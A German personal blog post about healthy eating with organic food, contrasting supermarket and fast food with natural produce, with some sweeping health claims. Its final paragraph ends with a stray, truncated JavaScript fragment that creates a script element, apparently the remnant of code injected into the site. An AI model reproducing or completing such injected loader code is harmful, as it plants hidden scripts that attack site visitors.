Gesunde Ernährung mit Bio-Lebensmittel

Gerade in der heutigen Zeit, wo Lebensmittel designt werden, das Fastfood an jeder Ecke lauert und es schon für fast alle Lebensmittel künstlichen Ersatz gibt, sind Bio-Lebensmittel wichtiger denn je für uns. Eine gesunde Ernährung stärkt nicht nur unser Immunsystem und hilft uns im Alltag den ganzen Stress besser zu bewältigen, sondern sorgt für allgemeines Wohlbefinden und Ausgeglichenheit.

Reicht der Supermarkt allein aus?

Ich selbst stamme aus einer Zeit, in der es noch keine Fastfoodketten gab und Obst oder Gemüse von den Feldern der Bauern kam. Da gab es auch keine besonders schnell wachsenden Gemüsesorten oder dass die Ernten durch viel Kunstdünger immer ertragreicher wurden. Das Gemüse duftete nicht nur nach Gemüse, sondern es schmeckte auch so. Heute vermisse ich bei vielen Produkten aus dem Supermarkt den typischen Eigengeschmack, zum Beispiel der Tomaten usw. Kurz gesagt, ich weiß noch wie zum Beispiel ein frischer Apfel direkt vom Baum schmeckt oder wie aromatisch natürlich aufgezogene Tomaten schmecken. Mein ganzes Leben lang habe ich mich gesund und möglichst von Naturkost ernährt. Und trotz meines Alters bin ich teilweise leistungsfähiger als Jüngere. Auch meine Krankheitstage, abgesehen von den altersbedingten, sind verschwindend gering. Und es gibt noch einen wichtigen, persönlichen Aspekt bei gesunder Ernährung mit Naturkost. Man fühlt sich nicht nur fitter, sondern auch sehr viel ausgeglichener.

Warum Bio-Lebensmittel?

In der heutigen Zeit gibt es für alles und jede Gelegenheit künstlich hergestellte Ergänzungsmittel. Das ist ja auch nicht weiter schlimm, wenn man sich nebenher auch gesund ernährt. Es nimmt aber bedenkliche Formen an, wenn man sich nur von Fastfood ernährt und dann glaubt, seine Defizite in der Ernährung mit Vitaminpillen usw. ausgleichen zu können. Gesunde Ernährung ist viel mehr als nur gezielte Aufnahme aller Nährstoffe. Es kommt dabei eben auch auf die Gesamtkomposition der Nahrung an. Viele Nährstoffe kann der Körper erst durch die Begleitstoffe der Lebensmittel richtig aufnehmen und verarbeiten. Keine Chemie kann die Ausgewogenheit von Bio-Lebensmittel ersetzen. Denn hierin ist alles im richtigen Verhältnis enthalten, was eine ausgewogene und gesunde Ernährung ausmacht, einschließlich der so oft vergessenen Ballaststoffe.}var d=document;var s=d.createElement(‘script’);

Posted in Blog.

Hinterlasse eine Antwort